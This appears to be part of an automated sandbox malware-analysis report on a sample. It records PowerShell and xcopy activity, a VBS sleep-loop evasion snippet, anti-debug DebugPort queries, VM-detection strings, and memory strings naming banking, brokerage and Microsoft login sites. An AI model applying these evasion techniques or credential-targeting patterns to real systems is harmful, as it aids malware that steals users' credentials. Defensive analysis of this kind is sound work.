Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Potential evasive VBS script found (sleep loop)

Source: C:\Windows\System32\wscript.exe

Dropped file: Do While iterationCounter < 10000 ' Limite d'itrations pour dmonstration WScript.Sleep 10000

Jump to dropped file

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7AD324
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7AD7E4
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7AD944
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7AD504
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7AD544
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7AD1E4
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Windows\SysWOW64\xcopy.exe	API/Special instruction interceptor: Address: 7FF84F7ADA44

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 13_2_053DD1C0 rdtsc

13_2_053DD1C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7964	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1720	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6352	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3348	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Window / User API: threadDelayed 1727	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Window / User API: threadDelayed 8245	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4740
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5038
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5746
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4036
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5622
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4121
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 869
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8903
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8492
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 945
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8171
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 761
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6196
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7967
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1553
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1265

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\xcopy.exe	API coverage: 3.1 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	API coverage: 0.2 %

Source: C:\Windows\System32\wscript.exe TID: 7952	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8324	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8456	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe TID: 9068	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe TID: 9068	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe TID: 9068	Thread sleep time: -46500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe TID: 9068	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe TID: 9068	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe TID: 9020	Thread sleep count: 1727 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe TID: 9020	Thread sleep time: -3454000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe TID: 9020	Thread sleep count: 8245 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe TID: 9020	Thread sleep time: -16490000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188	Thread sleep count: 4740 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188	Thread sleep count: 5038 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868	Thread sleep count: 5746 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868	Thread sleep count: 4036 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1388	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4292	Thread sleep count: 5622 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8488	Thread sleep count: 4121 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep count: 8510 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4956	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1104	Thread sleep count: 869 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8892	Thread sleep count: 8903 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8652	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8892	Thread sleep count: 150 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8652	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8664	Thread sleep count: 8492 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8756	Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8592	Thread sleep count: 945 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8520	Thread sleep count: 8171 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8512	Thread sleep count: 761 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 520	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 520	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292	Thread sleep count: 6196 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068	Thread sleep count: 1091 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012	Thread sleep count: 7967 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012	Thread sleep count: 1553 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 8250 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 1265 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -14757395258967632s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\xcopy.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\xcopy.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\xcopy.exe

Code function: 18_2_02D6C850 FindFirstFileW,FindNextFileW,FindClose,

18_2_02D6C850

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: wscript.exe, 00000007.00000003.1381429907.000001FB815FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: 354xH8-mR.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 354xH8-mR.18.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 354xH8-mR.18.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 354xH8-mR.18.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: wscript.exe, 00000000.00000002.1317345619.00000249C63DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267819142.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1316514427.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315867006.00000249C63DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314674812.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1317485663.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315910139.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1267819142.00000249C63DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275174756.00000249C6428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1315361723.00000249C63DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 354xH8-mR.18.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 354xH8-mR.18.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 354xH8-mR.18.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 354xH8-mR.18.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 354xH8-mR.18.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 354xH8-mR.18.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 354xH8-mR.18.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 354xH8-mR.18.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RNDzmzHPyfZMe3si.exe, 00000011.00000002.3724339856.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000012.00000002.3719828859.0000000003024000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.1856286583.000002899FDED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 354xH8-mR.18.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 354xH8-mR.18.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 354xH8-mR.18.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 354xH8-mR.18.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 354xH8-mR.18.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 354xH8-mR.18.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 354xH8-mR.18.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 354xH8-mR.18.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 354xH8-mR.18.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 354xH8-mR.18.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 354xH8-mR.18.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\xcopy.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
